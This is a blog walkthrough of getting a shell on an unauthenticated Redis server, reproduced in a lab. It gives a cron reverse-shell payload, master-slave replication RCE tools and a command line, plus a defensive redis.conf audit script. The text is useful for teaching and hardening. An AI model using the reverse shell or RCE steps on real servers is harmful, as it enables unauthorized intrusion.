Normally, during authorized penetration testing, even when the traditional vulnerability attacks (injection, file upload, etc.) yield nothing, scanning ports may still bring unexpected gains.
Simply put, Redis is a key-value database. All Redis data is operated on in memory, the in-memory data can be periodically persisted to disk, and a variety of data structures (string, hash, list, etc.) are supported.
By default, Redis binds to 0.0.0.0:6379. If IP access is not restricted, the Redis service is exposed to the public network, and if no password authentication is set, any user can access Redis without authorization: reading Redis data, writing a public key for remote login, and so on.
Obtaining database permissions alone is not satisfying; the goal is a shell (getshell)!
There are currently two mainstream methods: the first is a scheduled-task (cron) reverse shell, and the second is master-slave replication RCE.
1) set x "\n* * * * * bash -i >& /dev/tcp/1.1.1.1/888 0>&1\n"
2) config set dir /var/spool/cron/
3) config set dbfilename root
4) save
The vulnerability exists in versions 4.x and 5.x. Redis provides a master-slave mode, in which one Redis instance acts as the master and the other as the backup (slave); master and slave hold the same data, the slave only serves reads and the master only handles writes. Since Redis 4.x, external extensions (modules) make it possible to add new Redis commands, so a malicious .so file can be constructed. When two Redis instances are set up in master-slave mode, the master instance can synchronize a file to the slave through FULLRESYNC; the malicious .so file is then loaded on the slave to execute commands.
You need two tools; download them from GitHub.
1) git clone https://github.com/n0b0dyCN/RedisModules-ExecuteCommand (requires make)
2) git clone https://github.com/Ridter/redis-rce.git
Then connect to Redis through unauthorized access or a weak password, and run the script to obtain the shell.
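From the defender's side, here is an added example (not code from the original post) that audits a redis.conf for the weak settings the unauthorized-access, cron and master-slave tricks above depend on: an exposed bind address, protected-mode off, no requirepass, and the CONFIG/SLAVEOF/REPLICAOF/MODULE/DEBUG commands left enabled. The directive names are the standard redis.conf ones; the two sample configs are constructed.

```python
# Added example, not from the original post: audit a redis.conf for the
# settings the cron and master-slave replication techniques rely on.

SENSITIVE_COMMANDS = {"CONFIG", "SLAVEOF", "REPLICAOF", "MODULE", "DEBUG"}

WEAK_CONF = """# constructed: reachable from anywhere, no authentication
bind 0.0.0.0
protected-mode no
"""

HARDENED_CONF = """# constructed: loopback only, password, dangerous commands disabled
bind 127.0.0.1
protected-mode yes
requirepass REPLACE-WITH-A-LONG-RANDOM-SECRET
rename-command CONFIG ""
rename-command SLAVEOF ""
rename-command REPLICAOF ""
rename-command MODULE ""
rename-command DEBUG ""
"""

def parse_redis_conf(text):
    """Yield (directive, args) for each non-comment, non-empty line."""
    for line in text.splitlines():
        line = line.strip()
        if line and not line.startswith("#"):
            parts = line.split()
            yield parts[0].lower(), parts[1:]

def audit_redis_conf(text):
    """Return a list of findings; an empty list means no weak setting was seen."""
    values, disabled = {}, set()
    for directive, args in parse_redis_conf(text):
        if directive == "rename-command" and len(args) == 2 and args[1] in ('""', "''"):
            disabled.add(args[0].upper())      # renamed to "" removes the command
        else:
            values[directive] = args
    findings = []
    bind = values.get("bind", [])              # no bind line means all interfaces
    if not bind or any(a in ("0.0.0.0", "*", "::") for a in bind):
        findings.append("bind: listens on all interfaces; restrict to 127.0.0.1 or an internal IP")
    if (values.get("protected-mode") or ["yes"])[0].lower() != "yes":
        findings.append("protected-mode: disabled")
    password = values.get("requirepass", [])
    if not password or password[0] in ('""', "''"):
        findings.append("requirepass: not set, so anyone who can reach the port has full access")
    for cmd in sorted(SENSITIVE_COMMANDS - disabled):
        findings.append(f"rename-command: {cmd} still enabled (used by the cron and replication tricks)")
    return findings
```

Run `audit_redis_conf` over the real file (e.g. /etc/redis/redis.conf); on Redis 6+ also review the ACL `user` rules, which this check does not parse.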
This time I scanned 6379, which is Redis. Sometimes the default port is changed, so scanning all ports is recommended. This time the master-slave replication RCE is used to obtain the shell (since the vulnerability has been submitted to the SRC and a confidentiality agreement has been signed, a target machine was built to reproduce the real environment and ensure authenticity).
Attacker IP: 192.168.109.134
Server IP: 192.168.109.136
Connect to Redis through unauthorized access (if a password is set, you can try to brute-force it and then log in with AUTH <password>): redis-cli -h <ip>
Use master-slave replication RCE to obtain the shell
First, generate the malicious .so file: download RedisModules-ExecuteCommand and compile it with make.
On the attacker side, execute:
python redis-rce.py -r <target ip> -p <target port> -L <local ip> -f <malicious.so>
The shell is obtained successfully.
The above is the detailed content of Example analysis of Redis+Getshell. For more information, please follow other related articles on the PHP Chinese website!